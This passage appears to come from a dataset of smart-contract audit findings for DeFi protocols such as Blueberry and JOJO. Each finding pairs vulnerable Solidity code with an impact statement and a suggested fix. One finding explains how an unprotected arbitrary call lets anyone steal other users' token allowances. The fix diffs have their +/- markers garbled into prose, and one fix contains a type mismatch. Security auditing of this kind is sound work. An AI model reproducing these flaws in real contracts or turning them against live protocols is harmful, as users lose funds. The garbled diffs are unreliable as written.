deposited as margin.","It is necessary to differentiate the funds that are acquired by the swap and those funds that were there before and should stay in the contract:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..42f96cf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n@@ // Remove the line below\\n261,6 // Add the line below\\n261,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n bytes memory _swapParams,\\n address[] memory _tradeAssets\\n ) internal {\\n// Add the line below\\n int256[] memory _amountsBefore = new uint256[](_tradeAssets.length);\\n// Add the line below\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n _amountsBefore[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Add the line below\\n }\\n if (_swapParams.length > 0) {\\n // approve to swap route\\n for (uint256 i = 0; i < _swapApproveToken.length; i// Add the line below\\n// Add the line below\\n) {\\n@@ // Remove the line below\\n272,8 // Add the line below\\n276,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n }\\n uint256[] memory _tradeAmounts = new uint256[](_tradeAssets.length);\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Remove the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Remove the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n if (_amountsBefore[i] < IERC20(_tradeAssets[i]).balanceOf(address(this))) {\\n// Add the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)) // Remove the line below\\n _amountsBefore[i];\\n// Add the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n }\\n }\\n emit OpenPosition(_swapAddress, _swapApproveToken, _tradeAssets, _tradeAmounts);\\n }\\n```\\n\\nIf funds that were in the contract prior to the swap should be deposited there is the separate `MarginTrading.lendingPoolDeposit` function to achieve this.",When opening a trade funds can be deposited into Aave unintentionally. Thereby the funds act as margin and the trade can incur a larger loss than expected.,"```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n" +AuraSpell#openPositionFarm fails to return all rewards to user,high,"When a user adds to an existing position on AuraSpell, the contract burns their current position and remints them a new one. The issues is that WAuraPool will send all reward tokens to the contract but it only sends Aura back to the user, causing all other rewards to be lost.\\n```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n\\nInside WAuraPools#burn reward tokens are sent to the user.\\n```\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n if (pos.collateralSize > 0) {\\n (uint256 pid, ) = wAuraPools.decodeId(pos.collId);\\n if (param.farmingPoolId != pid)\\n revert Errors.INCORRECT_PID(param.farmingPoolId);\\n if (pos.collToken != address(wAuraPools))\\n revert Errors.INCORRECT_COLTOKEN(pos.collToken);\\n bank.takeCollateral(pos.collateralSize);\\n wAuraPools.burn(pos.collId, pos.collateralSize);\\n _doRefundRewards(AURA);\\n }\\n```\\n\\nWe see above that the contract only refunds Aura to the user causing all other extra reward tokens received by the contract to be lost to the user.",WAuraPool returns the reward tokens it sends. Use this list to refund all tokens to the user,User will lose all extra reward tokens from their original position,"```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n" +ShortLongSpell#openPosition uses the wrong balanceOf when determining how much collateral to put,high,"The _doPutCollateral subcall in ShortLongSpell#openPosition uses the balance of the uToken rather than the vault resulting in the vault tokens being left in the contract which will be stolen.\\n```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nWhen putting the collateral the contract is putting vault but it uses the balance of the uToken instead of the balance of the vault.",Use the balanceOf vault rather than vault.uToken,Vault tokens will be left in contract and stolen,"```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n" +BalancerPairOracle#getPrice will revert due to division by zero in some cases,medium,"`BalancerPairOracle#getPrice` internally calls `computeFairReserves`, which returns fair reserve amounts given spot reserves, weights, and fair prices. When the parameter `resA` passed to `computeFairReserves` is smaller than `resB`, division by 0 will occur.\\nIn `BalancerPairOracle#getPrice`, resA and resB passed to `computeFairReserves` are the balance of TokenA and TokenB of the pool respectively. It is common for the balance of TokenB to be greater than the balance of TokenA.\\n```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n\\nAnother case is when the decimals of tokenA is smaller than the decimals of tokenB, such as usdc(e6)-weth(e18).","```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n@@ // Remove the line below\\n50,7 // Add the line below\\n50,7 @@ contract BalancerPairOracle is UsingBaseOracle, IBaseOracle {\\n // // Remove the line below\\n// Remove the line below\\n> fairResA / r1^wB = constant product\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA^wA * resB^wB * r1^wB\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA * (resB/resA)^wB * r1^wB = resA * (r1/r0)^wB\\n// Remove the line below\\n uint256 r0 = resA / resB;\\n// Add the line below\\n uint256 r0 = resA * 10**(decimalsB) / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n```\\n",All functions that subcall `BalancerPairOracle#getPrice` will be affected.,"```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n" +Updating the feeManger on config will cause desync between bank and vaults,medium,"When the bank is initialized it caches the current config.feeManager. This is problematic since feeManger can be updated in config. Since it is precached the address in bank will not be updated leading to a desync between contracts the always pull the freshest value for feeManger and bank.\\n```\\n feeManager = config_.feeManager();\\n```\\n\\nAbove we see that feeManger is cached during initialization.\\n```\\n withdrawAmount = config.feeManager().doCutVaultWithdrawFee(\\n address(uToken),\\n shareAmount\\n );\\n```\\n\\nThis is in direct conflict with other contracts the always use the freshest value. This is problematic for a few reasons. The desync will lead to inconsistent fees across the ecosystem either charging users too many fees or not enough.",BlueBerryBank should always use config.feeManger instead of caching it.,After update users will experience inconsistent fees across the ecosystem,```\\n feeManager = config_.feeManager();\\n```\\n +ShortLongSpell#openPosition attempts to burn wrong token,medium,"ShortLongSpell#openPosition attempts to burn vault.uToken when it should be using vault instead. The result is that ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position\\n```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n\\nWe see above that the contract attempts to withdraw vault.uToken from the wrapper.\\n```\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nThis is in direct conflict with the collateral that is actually deposited which is vault. This will cause the function to always revert when adding to an existing position.",Burn token should be vault rather than vault.uToken,ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position,"```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n" +All allowances to DepositStableCoinToDealer and GeneralRepay can be stolen due to unsafe call,high,"DepositStableCoinToDealer.sol and GeneralRepay.sol are helper contracts that allow a user to swap and enter JOJODealer and JUSDBank respectively. The issue is that the call is unsafe allowing the contract to call the token contracts directly and transfer tokens from anyone who has approved the contract.\\n```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n\\nWe can see above that the call is totally unprotected allowing a user to make any call to any contract. This can be abused by calling the token contract and using the allowances of others. The attack would go as follows:\\nUser A approves the contract for 100 USDT\\nUser B sees this approval and calls depositStableCoin with the swap target as the USDT contract with themselves as the receiver\\nThis transfers all of user A USDT to them",Only allow users to call certain whitelisted contracts.,All allowances can be stolen,"```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n" +JUSD borrow fee rate is less than it should be,medium,"The borrow fee rate calculation is wrong causing the protocol to take less fees than it should.\\nThe borrowFeeRate is calculated through getTRate():\\n```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n\\n`t0Rate` is initialized as `1e18` in the test contracts:\\n```\\n constructor(\\n uint256 _maxReservesNum,\\n address _insurance,\\n address _JUSD,\\n address _JOJODealer,\\n uint256 _maxPerAccountBorrowAmount,\\n uint256 _maxTotalBorrowAmount,\\n uint256 _borrowFeeRate,\\n address _primaryAsset\\n ) {\\n // // rest of code\\n t0Rate = JOJOConstant.ONE;\\n }\\n```\\n\\n`SECONDS_PER_YEAR` is equal to `365 days` which is 60 * 60 * 24 * 365 = 31536000:\\n```\\nlibrary JOJOConstant {\\n uint256 public constant SECONDS_PER_YEAR = 365 days;\\n}\\n```\\n\\nAs time passes, `getTRate()` value will increase. When a user borrows JUSD the contract doesn't save the actual amount of JUSD they borrow, `tAmount`. Instead, it saves the current ""value"" of it, t0Amount:\\n```\\n function _borrow(\\n DataTypes.UserInfo storage user,\\n bool isDepositToJOJO,\\n address to,\\n uint256 tAmount,\\n address from\\n ) internal {\\n uint256 tRate = getTRate();\\n // tAmount % tRate ? tAmount / tRate + 1 : tAmount % tRate\\n uint256 t0Amount = tAmount.decimalRemainder(tRate)\\n ? tAmount.decimalDiv(tRate)\\n : tAmount.decimalDiv(tRate) + 1;\\n user.t0BorrowBalance += t0Amount;\\n```\\n\\nWhen you repay the JUSD, the same calculation is done again to decrease the borrowed amount. Meaning, as time passes, you have to repay more JUSD.\\nLet's say that JUSDBank was live for a year with a borrowing fee rate of 10% (1e17). `getTRate()` would then return: $1e18 + 1e17 * 31536000 / 31536000 = 1.1e18$\\nIf the user now borrows 1 JUSD we get: $1e6 * 1e18 / 1.1e18 ~= 909091$ for `t0Amount`. That's not the expected 10% decrease. Instead, it's about 9.1%.",Change formula to: `t0Amount = tAmount - tAmount.decimalMul(tRate)` where `t0Rate` is initialized with `0` instead of `1e18`.,Users are able to borrow JUSD for cheaper than expected,```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n +Subaccount#execute lacks payable,medium,"`Subaccount#execute` lacks `payable`. If `value` in `Subaccount#execute` is not zero, it could always revert.\\n`Subaccount#execute` lacks `payable`. The caller cannot send the value.\\n```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n\\nThe `Subaccount` contract does not implement receive() `payable` or fallback() `payable`, so it is unable to receive value (eth) . Therefore, `Subaccount#execute` needs to add `payable`.",Add a receive() external `payable` to the contract or `execute()` to add a `payable` modifier.,`Subaccount#execute` cannot work if `value` != 0.,"```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n" +It's possible to reset primaryCredit and secondaryCredit for insurance account,medium,"When because of negative credit after liquidations of another accounts, insurance address doesn't pass `isSafe` check, then malicious user can call JOJOExternal.handleBadDebt and reset both primaryCredit and secondaryCredit for insurance account.\\n`insurance` account is handled by JOJO team. Team is responsible to top up this account in order to cover losses. When bad debt is handled, then its negative credit value is added to the `insurance` account. Because of that it's possible that primaryCredit of `insurance` account is negative and `Liquidation._isSafe(state, insurance) == false`.\\n```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n\\nSo it's possible for anyone to call `handleBadDebt` for `insurance` address, once its primaryCredit is negative and `Liquidation._isSafe(state, insurance) == false`. This will reset both primaryCredit and secondaryCredit variables to 0 and break `insurance` calculations.",Do not allow `handleBadDebt` call with insurance address.,Insurance primaryCredit and secondaryCredit variables are reset.,"```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n" +When the `JUSDBank.withdraw()` is to another internal account the `ReserveInfo.isDepositAllowed` is not validated,medium,"The internal withdraw does not validate if the collateral reserve has activated/deactivated the isDepositAllowed variable\\nThe JUSDBank.withdraw() function has a param called isInternal that helps to indicate if the withdraw amount is internal between accounts or not. When the withdraw is internal the `ReserveInfo.isDepositAllowed` is not validated.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n\\nIn the other hand, the `isDepositAllowed` is validated in the deposit function in the `code line 255` but the withdraw to internal account is not validated.\\n```\\nFile: JUSDBank.sol\\n function _deposit(\\n DataTypes.ReserveInfo storage reserve,\\n DataTypes.UserInfo storage user,\\n uint256 amount,\\n address collateral,\\n address to,\\n address from\\n ) internal {\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n```\\n\\nAdditionally, the `ReserveInfo.isDepositAllowed` can be modified via the JUSDOperation.delistReserve() function. So any collateral's deposits can be deactivated at any time.\\n```\\nFile: JUSDOperation.sol\\n function delistReserve(address collateral) external onlyOwner {\\n DataTypes.ReserveInfo storage reserve = reserveInfo[collateral];\\n reserve.isBorrowAllowed = false;\\n reserve.isDepositAllowed = false;\\n reserve.isFinalLiquidation = true;\\n emit RemoveReserve(collateral);\\n }\\n```\\n","Add a `Reserve.isDepositAllowed` validation when the withdrawal is to another internal account.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n// Add the line below\\n// Add the line below\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] // Add the line below\\n= amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n",The collateral's reserve can get deposits via the internal withdraw even when the `Reserve.isDepositAllowed` is turned off making the `Reserve.isDepositAllowed` useless because the collateral deposits can be via `internal withdrawals`.,"```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n" +Lack of burn mechanism for JUSD repayments causes oversupply of JUSD,medium,"`JUSDBank.repay()` allow users to repay their JUSD debt and interest by transfering in JUSD tokens. Without a burn mechanism, it will cause an oversupply of JUSD that is no longer backed by any collateral.\\n`JUSDBank` receives JUSD tokens for the repayment of debt and interest. However, there are no means to burn these tokens, causing JUSD balance in `JUSDBank` to keep increasing.\\nThat will lead to an oversupply of JUSD that is not backed by any collateral. And the oversupply of JUSD will increase significantly during market due to mass repayments from liquidation.\\n```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n","Instead of transfering to the JUSDBank upon repayment, consider adding a burn mechanism to reduce the supply of JUSD so that it will be adjusted automatically.","To maintain its stability, JUSD must always be backed by more than 1 USD worth of collateral.\\nWhen there is oversupply of JUSD that is not backed by any collateral, it affects JUSD stability and possibly lead to a depeg event.","```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n" +UniswapPriceAdaptor fails after updating impact,medium,"The `impact` variable can have a maximum value of `uint32` (=4.294.967.295) after updating. This is too low and will cause the `UniswapPriceAdaptor#getMarkPrice()` function to revert.\\nWhen initialized, the `impact` variable is a `uint256`. However, in the `updateImpact` function, the newImpact is a `uint32`.\\n```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n\\nThe new `impact` variable will be too small because in the getMarkPrice() function, we need diff * 1e18 / JOJOPriceFeed <= impact:\\n```\\n require(diff * 1e18 / JOJOPriceFeed <= impact, ""deviation is too big"");\\n```\\n\\nThe result of `diff * 1e18 / JOJOPriceFeed <= impact` is a number with e18 power. It is very likely that it is larger than the `impact` variable which is a `uint32`. The function getMarkPrice() will revert.","Change the newImpact argument from uint32 to uint256.\\n```\\n// Remove the line below\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n// Add the line below\\n function updateImpact(uint256 newImpact) external onlyOwner { \\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n",The UniswapPriceAdaptor will malfunction and not return the price from Uniswap Oracle.,"```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n" +"In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee",medium,"In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee\\nIn JUSDBank contract, if the liquidator wants to liquidate more collateral than the borrowings of the liquidatee, the liquidator can pay additional USDC to get the liquidatee's collateral.\\n```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n\\nThe liquidator needs to pay USDC in the callback and the JUSDBank contract will require the final USDC balance of the liquidatee to increase.\\n```\\n require(\\n IERC20(primaryAsset).balanceOf(liquidated) -\\n primaryLiquidatedAmount >=\\n liquidateData.liquidatedRemainUSDC,\\n JUSDErrors.LIQUIDATED_AMOUNT_NOT_ENOUGH\\n );\\n```\\n\\nIf the liquidatee has USDC-denominated assets for sale, the liquidator can purchase the assets with USDC in the callback, so that the liquidatee's USDC balance will increase and the liquidator will not need to send USDC to the liquidatee to pass the check in the JUSDBank contract.",Consider banning over liquidation,"In case of over liquidation, the liquidator does not need to pay additional USDC to the liquidatee",```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n +FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC,medium,"FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC\\nIn both GeneralRepay.repayJUSD and FlashLoanRepay.JOJOFlashLoan, the user-supplied minReceive parameter is used for slippage control when swapping USDC.\\n```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n```\\n\\nHowever, this is not done in FlashLoanLiquidate.JOJOFlashLoan, and the lack of slippage control may expose the user to sandwich attacks when swapping USDC.",Consider making FlashLoanLiquidate.JOJOFlashLoan use the minReceive parameter for slippage control when swapping USDC.,The lack of slippage control may expose the user to sandwich 